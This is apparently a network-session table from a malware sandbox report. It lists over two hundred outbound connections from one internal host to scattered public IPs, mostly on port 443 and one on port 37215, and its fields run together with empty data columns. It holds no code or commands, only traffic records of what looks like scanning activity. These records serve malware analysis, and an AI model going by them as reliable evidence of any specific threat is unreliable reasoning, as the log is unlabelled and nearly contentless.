                                                16619192.168.2.2353226155.160.153.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16620192.168.2.234252259.210.3.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16621192.168.2.235433446.203.101.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16622192.168.2.2337346108.135.245.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16623192.168.2.2332796172.0.70.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16624192.168.2.235970876.41.33.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16625192.168.2.235208292.55.89.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16626192.168.2.235695069.88.163.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16627192.168.2.2341212180.152.234.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16628192.168.2.2341546122.254.144.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16629192.168.2.2342664120.8.120.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16630192.168.2.235160613.174.94.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16631192.168.2.235926441.237.41.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16632192.168.2.2356486189.143.197.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16633192.168.2.235519674.56.253.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16634192.168.2.2341288105.110.9.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16635192.168.2.2359546159.171.70.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16636192.168.2.235826423.61.105.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16637192.168.2.23442244.15.38.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16638192.168.2.2357144130.185.24.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16639192.168.2.2357576143.206.78.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16640192.168.2.2333124147.217.47.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16641192.168.2.2355938183.235.82.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16642192.168.2.2352358158.73.186.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16643192.168.2.2340942112.98.13.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16644192.168.2.235190497.64.156.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16645192.168.2.233469042.111.239.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16646192.168.2.2347924160.188.108.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16647192.168.2.23573389.144.47.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16648192.168.2.2350014134.25.157.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16649192.168.2.233396625.5.163.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16650192.168.2.234359844.236.75.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16651192.168.2.234622036.208.13.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16652192.168.2.2350606104.142.146.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16653192.168.2.234229457.99.225.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16654192.168.2.234022447.102.127.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16655192.168.2.2349354123.206.33.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16656192.168.2.2341710149.178.116.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16657192.168.2.2336456183.35.5.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16658192.168.2.2358414171.28.34.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16659192.168.2.23520668.159.211.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16660192.168.2.235321075.83.192.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16661192.168.2.234161857.68.163.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16662192.168.2.2348504203.101.57.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16663192.168.2.2341800212.189.229.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16664192.168.2.2356082126.27.11.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16665192.168.2.2351560144.65.196.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16666192.168.2.235594691.252.193.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16667192.168.2.2348014179.168.74.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16668192.168.2.2351618151.183.62.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16669192.168.2.2347142151.7.241.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16670192.168.2.2337552108.144.200.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16671192.168.2.2348530179.50.96.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16672192.168.2.233629841.213.242.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16673192.168.2.2339312101.177.73.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16674192.168.2.2360530220.106.99.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16675192.168.2.2349670187.139.47.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16676192.168.2.2334128208.195.89.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16677192.168.2.2347884103.143.250.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16678192.168.2.2346506170.48.123.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16679192.168.2.2346050210.200.224.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16680192.168.2.235906841.34.134.2137215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16681192.168.2.2342522112.145.98.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16682192.168.2.233284699.206.73.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16683192.168.2.235872465.252.122.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16684192.168.2.2356564178.118.69.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16685192.168.2.2356430187.247.218.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16686192.168.2.233940017.215.222.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16687192.168.2.2344542119.141.255.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16688192.168.2.2343322125.186.226.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16689192.168.2.235329490.111.2.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16690192.168.2.2354120216.90.188.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16691192.168.2.2338464108.142.236.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16692192.168.2.2357668216.1.178.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16693192.168.2.233541625.88.26.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16694192.168.2.2349718110.26.207.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16695192.168.2.233511665.34.65.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16696192.168.2.2338836166.236.121.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16697192.168.2.2341242196.251.50.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16698192.168.2.235701899.130.252.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16699192.168.2.235398251.78.238.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16700192.168.2.234134613.197.79.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16701192.168.2.2359284210.245.97.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16702192.168.2.2338764130.228.170.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16703192.168.2.233455035.72.123.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16704192.168.2.233902291.108.97.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16705192.168.2.234979498.4.58.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16706192.168.2.2341508117.133.179.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16707192.168.2.234010662.28.172.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16708192.168.2.233987447.250.37.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16709192.168.2.233394667.137.105.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16710192.168.2.2338310134.215.14.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16711192.168.2.2355428222.84.207.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16712192.168.2.2339892164.229.251.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16713192.168.2.2341680145.213.61.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16714192.168.2.234087024.187.184.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16715192.168.2.234627617.185.87.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16716192.168.2.234489634.31.38.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16717192.168.2.2339572222.105.244.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16718192.168.2.2354766183.244.79.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16719192.168.2.2349114192.245.203.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16720192.168.2.2340394188.248.107.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16721192.168.2.2359484172.126.44.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16722192.168.2.233574840.162.76.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16723192.168.2.2341268122.90.251.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16724192.168.2.2360592117.34.20.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16725192.168.2.2337846170.65.209.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16726192.168.2.2340586146.234.137.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16727192.168.2.234344442.147.132.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16728192.168.2.233549668.191.58.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16729192.168.2.2352464147.8.52.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16730192.168.2.2351376114.249.52.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16731192.168.2.235460442.243.133.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16732192.168.2.2356474141.84.145.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16733192.168.2.235660250.34.166.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16734192.168.2.2360822135.228.116.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16735192.168.2.234005243.184.36.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16736192.168.2.2347388219.122.174.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16737192.168.2.2340780223.191.21.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16738192.168.2.2356714184.214.78.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16739192.168.2.233756699.101.146.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16740192.168.2.233750081.88.90.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16741192.168.2.2336870133.199.128.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16742192.168.2.2354526146.8.79.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16743192.168.2.235385812.26.45.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16744192.168.2.2358472169.210.22.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16745192.168.2.235283048.181.126.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16746192.168.2.236060458.113.221.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16747192.168.2.2336592201.29.28.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16748192.168.2.235127439.16.252.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16749192.168.2.235224012.197.187.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16750192.168.2.233376025.122.194.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16751192.168.2.234638094.188.78.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16752192.168.2.235576064.230.41.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16753192.168.2.2340704151.93.4.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16754192.168.2.234327295.168.123.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16755192.168.2.2338792179.63.241.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16756192.168.2.235003090.217.52.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16757192.168.2.2338258216.224.20.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16758192.168.2.2341276208.105.188.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16759192.168.2.234216866.179.134.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16760192.168.2.2346476120.252.100.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16761192.168.2.2335878164.102.211.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16762192.168.2.235306097.111.194.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16763192.168.2.2340942175.141.81.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16764192.168.2.233583092.27.180.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16765192.168.2.2332804120.2.231.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16766192.168.2.2358730104.51.173.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16767192.168.2.2353320137.175.40.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16768192.168.2.2356562195.3.136.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16769192.168.2.233440469.30.36.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16770192.168.2.2344346104.129.150.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16771192.168.2.234536860.97.213.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16772192.168.2.23383244.68.99.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16773192.168.2.235018859.13.172.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16774192.168.2.2352882164.110.24.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16775192.168.2.2341306167.223.159.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16776192.168.2.2350584170.65.97.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16777192.168.2.2359660138.214.50.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16778192.168.2.2341926122.92.253.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16779192.168.2.2345080166.217.88.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16780192.168.2.236097431.204.122.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16781192.168.2.2357132213.174.96.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16782192.168.2.235015682.107.208.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16783192.168.2.233482483.59.163.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16784192.168.2.233457259.97.188.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16785192.168.2.2348322211.216.9.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16786192.168.2.2338378129.239.75.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16787192.168.2.2338360159.111.46.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16788192.168.2.235407267.30.213.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16789192.168.2.234629813.160.41.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16790192.168.2.235653896.163.94.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16791192.168.2.235670035.147.129.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16792192.168.2.2350490183.14.212.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16793192.168.2.2359332111.167.23.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16794192.168.2.234356669.201.124.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16795192.168.2.2360286141.19.152.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16796192.168.2.2335242179.79.125.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16797192.168.2.2346102109.165.98.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16798192.168.2.2347182147.88.229.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16799192.168.2.234263451.173.228.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16800192.168.2.2346852189.206.72.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16801192.168.2.235592882.210.125.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16802192.168.2.234775032.97.84.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16803192.168.2.234259466.254.31.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16804192.168.2.2338126156.222.12.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16805192.168.2.2340294165.208.137.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16806192.168.2.2335366117.239.255.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16807192.168.2.23390381.6.12.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16808192.168.2.2335568199.56.115.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16809192.168.2.2353388195.244.218.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16810192.168.2.2339334202.164.198.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16811192.168.2.2358640179.47.155.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16812192.168.2.234113299.237.55.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16813192.168.2.23456429.134.236.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16814192.168.2.2345982191.116.40.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16815192.168.2.235057481.176.180.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16816192.168.2.2360240182.148.101.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16817192.168.2.2351348103.115.149.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16818192.168.2.235007023.33.219.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16819192.168.2.2356640143.99.166.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16820192.168.2.2347842207.158.29.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16821192.168.2.235315013.135.32.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16822192.168.2.234335620.173.150.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16823192.168.2.233374473.230.74.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16824192.168.2.234925665.80.9.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16825192.168.2.2343416217.209.232.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16826192.168.2.235068884.178.28.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16827192.168.2.2342108110.138.48.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16828192.168.2.2354806149.23.44.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16829192.168.2.235152888.229.75.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16830192.168.2.2351500223.247.246.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16831192.168.2.2339876140.192.65.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16832192.168.2.2343568105.19.74.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16833192.168.2.2345828107.57.168.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16834192.168.2.233399625.205.141.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16835192.168.2.23414529.85.156.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16836192.168.2.2347590204.188.191.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16837192.168.2.2343446136.171.81.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16838192.168.2.2337824221.49.81.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16839192.168.2.2339068103.86.238.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16840192.168.2.2349610104.144.122.153443
                                                TimestampBytes transferredDirectionData


